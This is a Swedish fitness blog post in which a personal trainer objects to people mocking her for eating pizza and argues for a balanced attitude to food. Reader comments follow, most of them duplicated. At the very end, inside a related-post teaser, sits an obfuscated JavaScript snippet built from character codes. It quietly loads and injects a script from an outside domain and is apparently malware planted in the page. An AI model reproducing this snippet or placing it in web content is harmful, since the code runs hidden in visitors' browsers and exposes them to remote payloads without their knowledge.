MAN behöver inte leva på salladsblad för att man ät PT! -SUCK!!!!!

image image

Hej fina! Igår blev en låååååång men rolig dag. På många sätt.

Alltså jag jobbar med ett projekt. Eller rättare sagt ”vi”. Ett riktigt dreamteam. Snaaart är det officiellt;) Kan knappt hålla mig! Det är nära nu, min magkänsla säger att det kommer bli grymt! Nästan som en nyförälskelse så bubblar det i magen inför just detta projektet 🙂 

Igår körde jag PW längsmed vattnet, på morgonen. Frisk luft är alltid underskattat. Jag  åkte sedan direkt vidare till gymmet och körde PT kunder.

Jag kände mig piggare ju längre dagen gick. Det är något konstigt. Det är precis som om förkylningen (eller vad det nu är) lixom ligger och lurar. Den kryper fram med lätt feber då och då. Försvinner helt, men kommer tillbaka så fort jag TROR att den är borta! Om jag hade fått välja hade den hellre fått ”bryta ut” ordentligt! Hellre att jag blivit liggande ett par dagar, än att gå runt och känna mig utmattad, med feber då och då i veckor! Hmm, men hur ofta får man som man vill? 😉 

 Efter PT kunder var det dags för plåtning för olika brands.  Följt av middag och pizza med BÄSTA Herman. Min vän och fotograf <3

När vi kom in på pizzerian så hade jag på mig mina SATS kläder igen. Då tittade man konstigt på mig. Jag förstod DIREKT vad blickarna menade.

Men kunde inte hålla mig för skratt när kommentaren kom ”men guuuud, du som jobbar som PT äter väl ändå inte pizza?” Med ett litet skratt och en särskild underton. image

Vad är det för fel på folk?! VARFÖR skulle jag som jobbar som personlig Tränare INTE kunna äta en pizza?!  Det är precis lika dumt som att säga att man inte kan ge blommor till en florist…  det är ju oftast floristen största intresse, så varför inte?!

Jag är en föredetta jojo bantare. Jag har lärt mig av mina erfarenheter, på både gott och ont. Jag har varit KRAFTIGT överviktig. Jag VET hur det är att vara matmissbrukare.  Men en sån här situation gör mig uppriktigt sagt förbannad! Inte just på personen som sa det till mig igår. Den personen menade verkligen inget ill. Det hasplades bara ur ”hen” per automatik. UTAN onda avsikter.

Samtidigt la jag upp en bild ifrån resturangen med pizza och pizzaugn på instagram, där flödet snabbt fylldes med liknande kommentarer. Samma sak här, hälften menade säker inte heller något illa. Jag vet faktiskt inte varför. Men jag plockade bort bilden.

Men poängen är att det är en så skev inställning! Varför är det så vanligt med dessa kommentarer och reaktioner när en träningsprofil eller en tränings yrkesprofil som som tex en PT så fort äter annat än sallad och kött?!

Så fort det handlar om pizza, alkohol eller en matkorg i affären fylld med tex godis och glass så kommer dessa reaktioner. I matsfären så behöver inte ens godiset och glassen vara till mig själv. Det kan lika gärna avta till Lilleman inför tegen tex.

VARFÖR ska man för att man har ett brinnande intresse för just träning och dessutom tränar mycket INTE kunna äta som i detta fallet en pizza? Utan just denna reaktion? Varför får det den spontana reaktionen som det fick igår? Jag förstår VERKLIGEN inte, så du får jätte gärna förklara eller dela med dig av din teori kring detta. 

Vi som jobbar inom branschen  tränar oftast mer en gemeneman. Vi tränar oftast mer än en ”vanlig” motionär. Av olika anledningar såklart, det är ju individuellt som med precis allt annat. Men förhoppningsvis så har vi ett brinnande intresse för det, plus att vi har det väldigt lättillgängligt. Jag har sagt/skrivit det förut!

Jag tränare för att MÅ BRA! Ät bra, träna bra och må bra! Allting hänger ihop, det gäller att hitta den där balansen som passar just dig. 

Jag HAR jätte lätt för att gå upp i vikt. Jag slarvar med kosten i perioder och äter då i regel för LITE. Vilket är min svaghet som jag alltid behöver tänka på och jobba med.

Men återigen, huvudpoängen är ändå att jag tränar för att må bra. Om man är så pass aktiv om jag är (och många bransch kollegor såklart) Så kan man med GOTT SAMVETE äta den där pizzan då och då. Eller glassen, nybakade brödet, chokladen, rödvinet eller vad det nu är som man verkligen tycker om att unna sig ibland. Det är HELT okay! Jag kommer aldrig att bli den där tjejen som sitter med vänner och familj med ett par salladsblad på tallriken.

Jag kan heller inte äta pizza, glass, godis varje vecka. Om jag skulle göra det så skulle jag snabbt märka av hur det påverkar mig negativt och jag skulle då inte må bra! Jag går väldigt snabbt upp i vikt, får väldigt oregelbundet blodsocker taskig sömn, och ett sötsug från h*lvetet om jag unnar mig/syndar på vardaglig basis.

Men att unna mig ibland, och att välja mina tillfällen och då äta precis som jag vill. Det kommer jag att fortsätta göra, med just gott samvete =)

Är det någonting som jag vill förespråka här inne så är det en sund inställning till mat. Jag avskyr dieter och quick-fix! För att jag själv levt just i dietvärlden, och totalt sabbat min egen ämnestonsättning och mät riktigt, riktigt dåligt under perioder. (Mer om det i ett annat inlägg) Vart jag vill komma med hela detta inlägget är följande. Som min kolega och grundaren bakom HÄLSOKICKEN brukar säga Ät bra, Träna bra, Må bra!

Det handlar om att hitta en sund balans, där man INTE får en matfixering åt något håll! Att vara matfixerad och hela tiden tänka på vad man INTE får äta, vad man INTE får göra det leder sällan till något gott! Fokusera på det positiva istället, det du FÅR göra, det du redan GÖR som  får dig att må bra.

-Ju mer du rör på dig, ju mer kan du äta, utan negativa hälsoeffekter. Ganska logiskt, eller hur? 😉  

Nu är min morgon workout done! Ett ”mjukis pass” där jag precis kört igenom hela kroppen, mycket fokus på rigg och ”korsett” (mage ländrygg). Inget pulshöjande och i min takt, då jag fortfarande är nojig över min förkylning som ligger under ytan och provocerar mig.

Idag är det fredag. Jag hade medvetet hållt denna dagen tom från PT bokningar. Men fick ett samtal nu på morgonen, så jag ska hoppa in och göra ett undantag iallfall DET är en svår balans i mitt nya yrke som PT. Att hitta den balansen. Man vill vara tillgänglig dygnet runt, men det går ju inte. Ett par månader till sen har jag nog hittat ”mitt flow” och bra rutiner =)

 Ikväll ska jag ska på gala grej med 20-tal och Gatsby tema. HUR kunde jag missa det på inbjudan?

Nu måste jag rota igenom min garderob och googla gatsby bilder för att lyckas anamma det på något bra sätt! Hmm, vilket världsproblem… NOT! hehe! Men ändå 😉 Vad har du för fredags planer? Ledig? jobb? Fest? Eller kanske tacos framför IDOL? Berätta gärna.. Stor kram

/ My Martens 

27 Komentarer

 1. Heja dig My ?
  Är det någon som kan äta fet mat ibland är väl den som tränar och sköter sin kropp!
  Jag tänker att livet får inte bli tråkigt med mat o godisförbund bara för att är sund.
  Kram

 2. Hahaha När jag hade evas matkasse under några år kom jag in på en grillmoj, jag bad om en kokt med bröd. Tjejen i kassan tittar på mig och säger sedan ”Äter du sådant här?” Jag fattade nada, visste inte ens att jag var igenkänd. Det tog faktiskt ett tag innan jag förstod att hon syftade på att jag levererade matkassar och då borde äta min egen kasse. Kram och fin fredag!

 3. Heja dig My 😀
  Är det någon som kan äta fet mat ibland är väl den som tränar och sköter sin kropp!
  Jag tänker att livet får inte bli tråkigt med mat o godisförbund bara för att är sund.
  Kram

 4. Hahaha När jag hade evas matkasse under några år kom jag in på en grillmoj, jag bad om en kokt med bröd. Tjejen i kassan tittar på mig och säger sedan ”Äter du sådant här?” Jag fattade nada, visste inte ens att jag var igenkänd. Det tog faktiskt ett tag innan jag förstod att hon syftade på att jag levererade matkassar och då borde äta min egen kasse. Kram och fin fredag!

 5. När man tränar och tänker på vad man stoppar i sig hela tiden har man ibland rätt att unna sig dålig mat.
  Jag tycker du gör ett grymt bra jobb med allt. <3

 6. När man tränar och tänker på vad man stoppar i sig hela tiden har man ibland rätt att unna sig dålig mat.
  Jag tycker du gör ett grymt bra jobb med allt. <3

 7. Agreed! Lite samma föreställningar i yoga-världen, bara för att jag andas och stretchar och håller på med visualisering så försvinner ju inte min ”sweet tooth”, har inte heller några förbud eller mat- restriktioner men jag är väldigt bra på att laga god hälsosam mat, och lyckligt lottad som bor vid Medelhavet, så med mina kvällspromenader vid stranden är jag lycklig;-) I ett förhållande är det ju toppen att ha samma inställning till god mat, rörelse och hälsa.. i synnerhet när man har barn. Trevlig helg!

 8. Agreed! Lite samma föreställningar i yoga-världen, bara för att jag andas och stretchar och håller på med visualisering så försvinner ju inte min ”sweet tooth”, har inte heller några förbud eller mat- restriktioner men jag är väldigt bra på att laga god hälsosam mat, och lyckligt lottad som bor vid Medelhavet, så med mina kvällspromenader vid stranden är jag lycklig;-) I ett förhållande är det ju toppen att ha samma inställning till god mat, rörelse och hälsa.. i synnerhet när man har barn. Trevlig helg!

 9. Fina My, jag kollar in din blogg nästan varje dag, vill läsa lite romantik snart ?
  Men hur gör jag för att få min bild i kommentarer, vill verkligen inte vara anonym, det är ju inget kul…kram, krya på dig ?

 10. Fina My, jag kollar in din blogg nästan varje dag, vill läsa lite romantik snart 😉
  Men hur gör jag för att få min bild i kommentarer, vill verkligen inte vara anonym, det är ju inget kul…kram, krya på dig 🌹

 11. Ärligt talat My ( bli inte sur nu ) kanske lägger du ner för mycket energi på att bry dig om vad andra tycker om vad du äter eller inte äter.
  Ät vad du vill och lägg ut vad du vill och skit i kommentarerna.
  Det blir så enahanda annars att varje gång det gäller mat ( eller dryck) så ska du berätta allt som varit innan, hur du gjort din viktresa, och skadat ämnesomsättningen mm mm.
  Det är inte nödvändigt för jag tror nog de flesta som läser vet, och så många nytillkomna läsare att man måste förklara allt i varje inlägg, det är det väl ändå inte.
  Stå på dig! Ät drick vad du vill och som sagt, lägg inte energi på kommentarerna, det bygger bara på det negativa tror jag.
  Men jag vill ge dig ett råd och det är att ta det verkligt LUGNT med träning om du känner dig febrig/förkyld. ( Fast det vet du väl redan)

 12. Ärligt talat My ( bli inte sur nu ) kanske lägger du ner för mycket energi på att bry dig om vad andra tycker om vad du äter eller inte äter.
  Ät vad du vill och lägg ut vad du vill och skit i kommentarerna.
  Det blir så enahanda annars att varje gång det gäller mat ( eller dryck) så ska du berätta allt som varit innan, hur du gjort din viktresa, och skadat ämnesomsättningen mm mm.
  Det är inte nödvändigt för jag tror nog de flesta som läser vet, och så många nytillkomna läsare att man måste förklara allt i varje inlägg, det är det väl ändå inte.
  Stå på dig! Ät drick vad du vill och som sagt, lägg inte energi på kommentarerna, det bygger bara på det negativa tror jag.
  Men jag vill ge dig ett råd och det är att ta det verkligt LUGNT med träning om du känner dig febrig/förkyld. ( Fast det vet du väl redan)

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/